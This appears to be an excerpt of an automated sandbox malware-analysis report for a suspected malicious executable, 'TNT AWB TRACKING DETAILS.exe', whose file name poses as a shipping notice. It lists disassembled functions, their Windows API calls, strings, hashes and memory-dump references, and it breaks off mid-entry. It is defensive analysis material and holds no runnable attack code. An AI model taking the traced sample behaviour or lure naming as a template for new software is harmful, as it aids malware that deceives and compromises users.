                                      • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                      • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                      • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                      Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,0040F545,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,004A90E8,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,?,0040F545), ref: 0041013C
                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                      • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                      • _wcscat.LIBCMT ref: 0044BCAF
                                      • _wcslen.LIBCMT ref: 0044BCBB
                                      • _wcslen.LIBCMT ref: 0044BCD1
                                      • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 2326526234-1173974218
                                      • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                      • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                      • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                      • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                      Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                      • _wcslen.LIBCMT ref: 004335F2
                                      • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                      • GetLastError.KERNEL32 ref: 0043362B
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                      • _wcsrchr.LIBCMT ref: 00433666
                                        • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                      • String ID: \
                                      • API String ID: 321622961-2967466578
                                      • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                      • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                      • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                      • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                      Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 1038674560-2734436370
                                      • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                      • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                      • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                      • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                      Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                      • __lock.LIBCMT ref: 00417981
                                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                      • __lock.LIBCMT ref: 004179A2
                                      • ___addlocaleref.LIBCMT ref: 004179C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL$pI
                                      • API String ID: 637971194-197072765
                                      • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                      • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                      • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                      • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                      Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove$_malloc
                                      • String ID:
                                      • API String ID: 1938898002-0
                                      • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                      • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                      • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                      • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                      Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                      • _memmove.LIBCMT ref: 0044B555
                                      • _memmove.LIBCMT ref: 0044B578
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                      • String ID:
                                      • API String ID: 2737351978-0
                                      • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                      • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                      • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                      • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                      Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                      • __calloc_crt.LIBCMT ref: 00415246
                                      • __getptd.LIBCMT ref: 00415253
                                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                      • _free.LIBCMT ref: 0041529E
                                      • __dosmaperr.LIBCMT ref: 004152A9
                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                      • String ID:
                                      • API String ID: 3638380555-0
                                      • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                      • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                      • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                      • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                      Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ClearErrorInitLast
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 3207048006-625585964
                                      • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                      • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                      • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                      • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                      Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                      • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                      • gethostbyname.WSOCK32(?), ref: 004655A6
                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                      • _memmove.LIBCMT ref: 004656CA
                                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                      • WSACleanup.WSOCK32 ref: 00465762
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                      • String ID:
                                      • API String ID: 2945290962-0
                                      • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                      • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                      • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                      • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                      Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                      • String ID:
                                      • API String ID: 1457242333-0
                                      • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                      • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                      • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                      • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                      Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ConnectRegistry_memmove_wcslen
                                      • String ID:
                                      • API String ID: 15295421-0
                                      • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                      • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                      • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                      • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                      Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • _wcstok.LIBCMT ref: 004675B2
                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                      • _wcscpy.LIBCMT ref: 00467641
                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                      • _wcslen.LIBCMT ref: 00467793
                                      • _wcslen.LIBCMT ref: 004677BD
                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                      • String ID: X
                                      • API String ID: 780548581-3081909835
                                      • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                      • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                      • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                      • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                      Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                      • CloseFigure.GDI32(?), ref: 0044751F
                                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
